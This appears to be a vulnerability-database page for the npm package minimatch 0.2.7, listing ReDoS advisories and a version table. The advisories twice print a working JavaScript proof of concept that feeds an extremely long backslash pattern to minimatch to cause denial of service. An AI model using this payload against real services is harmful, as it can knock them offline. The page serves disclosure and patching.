NodeJS/minimatch/0.2.7
a glob matcher in javascript
https://www.npmjs.com/package/minimatch
MIT
3 Security Vulnerabilities
minimatch ReDoS vulnerability
- https://nvd.nist.gov/vuln/detail/CVE-2022-3517
- https://github.com/grafana/grafana-image-renderer/issues/329
- https://github.com/isaacs/minimatch/commit/a8763f4388e51956be62dc6025cec1126beeb5e6
- https://github.com/nodejs/node/issues/42510
- https://github.com/advisories/GHSA-f8q6-p94x-37v3
- https://lists.debian.org/debian-lts-announce/2023/01/msg00011.html
- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MTEUUTNIEBHGKUKKLNUZSV7IEP6IP3Q3/
- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UM6XJ73Q3NAM5KSGCOKJ2ZIA6GUWUJLK/
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
Proof of Concept
```javascript
var minimatch = require("minimatch");
// utility function for generating long strings
var genstr = function (len, chr) {
  var result = "";
  for (var i = 0; i <= len; i++) {
    result = result + chr;
  }
  return result;
};
// a character class that opens with "[!" followed by a very long run of backslashes
var exploit = "[!" + genstr(1000000, "\\") + "A";
// minimatch exploit.
console.log("starting minimatch");
minimatch("foo", exploit);
console.log("finishing minimatch");
```
Recommendation
Update to version 3.0.2 or later.
Regular Expression Denial of Service
Minimatch is a minimal matching utility that works by converting glob expressions into JavaScript RegExp objects. The primary function, minimatch(path, pattern), is vulnerable to ReDoS in the pattern parameter. This is because of the regular expression on line 521 of minimatch.js: `/((?:\\{2})*)(\\?)\|/g`. The problematic portion of the regex is `((?:\\{2})*)`, which matches against `\\`.
A proof of concept is as follows:
```javascript
var minimatch = require("minimatch");
// utility function for generating long strings
var genstr = function (len, chr) {
  var result = "";
  for (var i = 0; i <= len; i++) {
    result = result + chr;
  }
  return result;
};
var exploit = "[!" + genstr(1000000, "\\") + "A";
// minimatch exploit.
console.log("starting minimatch");
minimatch("foo", exploit);
console.log("finishing minimatch");
```
107 Other Versions
Version | License | Security | Released | Age
---|---|---|---|---
9.0.4 | ISC | | 2024-03-28 - 19:42 | about 2 months
9.0.3 | ISC | | 2023-07-06 - 17:05 | 11 months
9.0.2 | ISC | | 2023-06-23 - 21:12 | 11 months
9.0.1 | ISC | | 2023-05-20 - 20:53 | 12 months
9.0.0 | ISC | | 2023-04-09 - 22:15 | about 1 year
8.0.4 | ISC | | 2023-04-09 - 20:17 | about 1 year
8.0.3 | ISC | | 2023-04-03 - 16:51 | about 1 year
8.0.2 | ISC | | 2023-04-02 - 03:41 | about 1 year
8.0.1 | ISC | | 2023-04-02 - 03:39 | about 1 year
8.0.0 | ISC | | 2023-04-02 - 03:33 | about 1 year
7.4.6 | ISC | | 2023-04-09 - 20:18 | about 1 year
7.4.5 | ISC | | 2023-04-03 - 16:49 | about 1 year
7.4.4 | ISC | | 2023-04-01 - 23:44 | about 1 year
7.4.3 | ISC | | 2023-03-22 - 18:52 | about 1 year
7.4.2 | ISC | | 2023-03-01 - 20:13 | about 1 year
7.4.1 | ISC | | 2023-03-01 - 07:59 | about 1 year
7.4.0 | ISC | | 2023-03-01 - 06:59 | about 1 year
7.3.0 | ISC | | 2023-02-27 - 19:58 | about 1 year
7.2.0 | ISC | | 2023-02-26 - 09:13 | about 1 year
7.1.4 | ISC | | 2023-02-26 - 01:03 | about 1 year
7.1.3 | ISC | | 2023-02-25 - 02:07 | about 1 year
7.1.2 | ISC | | 2023-02-24 - 22:56 | about 1 year
7.1.1 | ISC | | 2023-02-24 - 00:36 | about 1 year
7.1.0 | ISC | | 2023-02-22 - 23:45 | about 1 year
7.0.1 | ISC | | 2023-02-22 - 02:01 | about 1 year
7.0.0 | ISC | | 2023-02-20 - 00:45 | about 1 year
6.2.0 | ISC | | 2023-02-13 - 08:58 | over 1 year
6.1.10 | ISC | | 2023-02-13 - 08:20 | over 1 year
6.1.9 | ISC | | 2023-02-13 - 06:54 | over 1 year
6.1.8 | ISC | | 2023-02-11 - 21:10 | over 1 year
6.1.7 | ISC | | 2023-02-11 - 20:33 | over 1 year
6.1.6 | ISC | | 2023-01-22 - 17:52 | over 1 year
6.1.5 | ISC | | 2023-01-17 - 22:17 | over 1 year
6.1.4 | ISC | | 2023-01-17 - 17:46 | over 1 year
6.1.3 | ISC | | 2023-01-17 - 17:24 | over 1 year
6.1.2 | ISC | | 2023-01-17 - 15:02 | over 1 year
6.1.1 | ISC | | 2023-01-17 - 14:57 | over 1 year
6.1.0 | ISC | | 2023-01-17 - 07:11 | over 1 year
6.0.4 | ISC | | 2023-01-16 - 01:55 | over 1 year
6.0.3 | ISC | | 2023-01-15 - 23:08 | over 1 year
6.0.2 | ISC | | 2023-01-15 - 21:26 | over 1 year
6.0.1 | ISC | | 2023-01-15 - 17:37 | over 1 year
6.0.0 | ISC | | 2023-01-14 - 21:07 | over 1 year
5.1.6 | ISC | | 2023-01-17 - 19:46 | over 1 year
5.1.5 | ISC | | 2023-01-17 - 15:04 | over 1 year
5.1.4 | ISC | | 2023-01-14 - 19:09 | over 1 year
5.1.3 | ISC | | 2023-01-14 - 18:54 | over 1 year
5.1.2 | ISC | | 2022-12-20 - 15:12 | over 1 year
5.1.1 | ISC | | 2022-11-29 - 20:33 | over 1 year
5.1.0 | ISC | | 2022-05-16 - 16:13 | about 2 years
5.0.1 | ISC | | 2022-02-24 - 17:58 | about 2 years
5.0.0 | ISC | | 2022-02-15 - 16:50 | over 2 years
4.2.3 | ISC | | 2023-01-17 - 19:47 | over 1 year
4.2.2 | ISC | | 2023-01-17 - 15:09 | over 1 year
4.2.1 | ISC | | 2022-02-15 - 16:35 | over 2 years
4.2.0 | ISC | | 2022-02-15 - 16:03 | over 2 years
4.1.1 | ISC | | 2022-02-13 - 04:22 | over 2 years
4.1.0 | ISC | | 2022-02-13 - 00:58 | over 2 years
4.0.0 | ISC | | 2022-02-13 - 00:37 | over 2 years
3.1.2 | ISC | | 2022-02-15 - 20:32 | over 2 years
3.1.1 | ISC | | 2022-02-13 - 04:01 | over 2 years
3.1.0 | ISC | | 2022-02-13 - 01:03 | over 2 years
3.0.8 | ISC | | 2022-02-15 - 20:33 | over 2 years
3.0.7 | ISC | | 2022-02-13 - 04:03 | over 2 years
3.0.6 | ISC | | 2022-02-12 - 23:58 | over 2 years
3.0.5 | ISC | | 2022-02-06 - 20:28 | over 2 years
3.0.4 | ISC | 1 | 2017-05-07 - 18:11 | about 7 years
3.0.3 | ISC | 1 | 2016-08-08 - 17:45 | almost 8 years
3.0.2 | ISC | 1 | 2016-06-17 - 20:13 | almost 8 years
3.0.0 | ISC | 3 | 2015-09-27 - 18:18 | over 8 years
2.0.10 | ISC | 3 | 2015-07-23 - 01:51 | almost 9 years
2.0.9 | ISC | 3 | 2015-07-18 - 23:03 | almost 9 years
2.0.8 | ISC | 3 | 2015-05-19 - 01:38 | about 9 years
2.0.7 | MIT | 3 | 2015-04-29 - 15:43 | about 9 years
2.0.6 | MIT | 3 | 2015-04-29 - 15:25 | about 9 years
2.0.5 | MIT | 3 | 2015-04-29 - 14:37 | about 9 years
2.0.4 | MIT | 3 | 2015-03-12 - 17:34 | about 9 years
2.0.3 | MIT | 3 | 2015-03-10 - 02:03 | about 9 years
2.0.2 | MIT | 3 | 2015-03-10 - 00:34 | about 9 years
2.0.1 | MIT | 3 | 2014-12-01 - 16:30 | over 9 years
2.0.0 | MIT | 3 | 2014-12-01 - 02:12 | over 9 years
1.0.0 | MIT | 3 | 2014-07-28 - 21:29 | almost 10 years
0.4.0 | MIT | 3 | 2014-07-11 - 23:25 | almost 10 years
0.3.0 | MIT | 3 | 2014-05-13 - 00:47 | about 10 years
0.2.14 | MIT | 3 | 2013-12-16 - 22:01 | over 10 years
0.2.13 | MIT | 3 | 2013-12-16 - 06:02 | over 10 years
0.2.12 | MIT | 3 | 2013-04-12 - 19:28 | about 11 years
0.2.11 | MIT | 3 | 2013-02-25 - 16:23 | about 11 years
0.2.10 | MIT | 3 | 2013-02-25 - 16:21 | about 11 years
0.2.9 | MIT | 3 | 2012-10-25 - 15:34 | over 11 years
0.2.8 | MIT | 3 | 2012-10-25 - 15:24 | over 11 years
0.2.7 | MIT | 3 | 2012-10-04 - 03:49 | over 11 years
0.2.6 | MIT | 3 | 2012-08-13 - 16:42 | almost 12 years
0.2.5 | MIT | 3 | 2012-06-04 - 20:57 | almost 12 years
0.2.4 | MIT | 3 | 2012-03-29 - 01:48 | about 12 years
0.2.3 | MIT | 3 | 2012-03-29 - 01:37 | about 12 years
0.2.2 | MIT | 3 | 2012-03-22 - 05:22 | about 12 years
0.2.0 | MIT | 3 | 2012-02-22 - 11:04 | about 12 years
0.1.5 | MIT | 3 | 2012-02-04 - 19:32 | over 12 years
0.1.4 | MIT | 3 | 2012-01-19 - 00:14 | over 12 years